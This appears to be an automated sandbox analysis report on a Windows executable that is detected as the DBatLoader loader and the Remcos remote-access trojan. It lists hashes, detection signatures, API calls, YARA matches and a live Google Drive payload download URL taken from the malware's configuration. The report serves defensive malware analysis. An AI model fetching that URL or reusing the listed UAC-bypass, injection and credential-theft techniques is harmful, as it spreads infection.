Windows Analysis Report
nft438A5fN.exe

Overview

General Information

Sample name: nft438A5fN.exe
renamed because original name is a hash value
Original sample name: 02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617.exe
Analysis ID: 1562863
MD5: 1a4d920b70293f85958a9a2cde581f6f
SHA1: 756015ae8f1b03f14bc1126e6b2183a383631186
SHA256: 02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617
Tags: doganalecmdexeuser-JAMESWT_MHT

Detection

DBatLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Child Processes Of SndVol.exe
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

Source: nft438A5fN.exe Avira: detected
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Avira: detection malicious, Label: TR/AD.Nekark.iteef
Source: nft438A5fN.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi"]}
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF ReversingLabs: Detection: 57%
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Virustotal: Detection: 68%
Source: nft438A5fN.exe ReversingLabs: Detection: 57%
Source: nft438A5fN.exe Virustotal: Detection: 68%
Source: Yara match File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Joe Sandbox ML: detected
Source: nft438A5fN.exe Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 11_2_032338C8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 21_2_02EB38C8
Source: nft438A5fN.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03207538 _wcslen,CoGetObject, 11_2_03207538
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E87538 _wcslen,CoGetObject, 21_2_02E87538
Source: nft438A5fN.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
Source: Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02C95908
Source: C:\Users\Public\alpha.pif Code function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_00050207
Source: C:\Users\Public\alpha.pif Code function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_0005589A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose, 7_2_00063E66
Source: C:\Users\Public\alpha.pif Code function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00054EC1
Source: C:\Users\Public\alpha.pif Code function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 7_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_0321C322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_0320C388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_0320928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_032096A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_03219B86
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03207877 FindFirstFileW,FindNextFileW, 11_2_03207877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_03208847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0324E8F9 FindFirstFileExA, 11_2_0324E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_0320BD72
Source: C:\Users\Public\alpha.pif Code function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 15_2_0005589A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 15_2_00050207
Source: C:\Users\Public\alpha.pif Code function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose, 15_2_00063E66
Source: C:\Users\Public\alpha.pif Code function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 15_2_00054EC1
Source: C:\Users\Public\alpha.pif Code function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 15_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 21_2_02E8928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 21_2_02E8C388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 21_2_02E9C322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 21_2_02E896A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW, 21_2_02E99B86
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02ECE8F9 FindFirstFileExA, 21_2_02ECE8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E87877 FindFirstFileW,FindNextFileW, 21_2_02E87877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 21_2_02E88847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 21_2_02E8BD72
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 11_2_03207CD2

Networking

Source: Malware configuration extractor URLs: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAE4B8 InternetCheckConnectionA, 0_2_02CAE4B8
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 142.250.181.129:443
Source: global traffic HTTP traffic detected: GET /download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: drive.usercontent.google.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03216676 Sleep,URLDownloadToFileW, 11_2_03216676
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: nft438A5fN.exe, 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: Amcache.hve.14.dr String found in binary or memory: http://upx.sf.net
Source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: nft438A5fN.exe, 00000000.00000002.1655641681.00000000396BD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/dow
Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi
Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/t
Source: nft438A5fN.exe, 00000000.00000002.1611613314.0000000000884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com:443/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdiX?
